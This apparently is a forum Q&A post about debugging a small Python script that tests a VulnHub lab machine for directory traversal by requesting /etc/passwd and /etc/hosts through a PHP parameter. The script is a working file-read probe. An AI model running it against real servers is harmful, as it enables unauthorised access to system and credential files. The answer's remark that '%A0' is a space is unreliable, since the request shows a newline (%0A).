# Check if string contains in returned webpage

Tags: python, python-requests, contains

**Script**

The simple script below is a script that checks for directory traversal vulnerability. It checks for example for files like:

http://192.168.152.152/index1.php?help=true&connect=**/etc/hosts**
http://192.168.152.152/index1.php?help=true&connect=**/etc/passwd**

If the file doesn't exist the webserver returns a "failed to open stream" error.

```
import requests

def checkfile(file):
        url = 'http://192.168.152.152/index1.php?help=true&connect=%s'%(file)
        r = requests.get(url)
        **if "failed" not in (r.text):**
                status = "[OK]"
                return status
        else:
                status = "[FAILED]"
                return status

with open('files', 'r') as f:
        for file in f:
                result = checkfile(file)
                print  "File %s %s" %(file, result.strip())
```

**My problem**

Even if the file exist and no "failed" error message is thrown, my script returned always "[FAILED]". The `r.text` contains the entire response from the weserver (html page). Who can help?

Ps. this is part of a legal security challange (https://www.vulnhub.com/entry/pwnos-10,33/)

Comment: Your code does not check whether  a "failed" error message is thrown but whether `r.text` contains `"failed"` as a substring.

Comment: Thanks. Yes, but failed should (or shouldn't) be in r.text, so why does `if "failed" not in (r.text):` not work? What is a alternative for it.

Comment: What makes you think it does not work? You said "should (or shouldn't) be" but that is not relevant, only the actual content of `r.text` matters.

Answer (score 0, accepted):

The script was mainly fine. Via Wireshark i saw what i did wrong. There was a space behind every file:

```
GET /index1.php?help=true&connect=/etc/passwd%0A <-----%A0 = space
```

So when is stripped that it works fine.

```
result = checkfile(file.strip())
```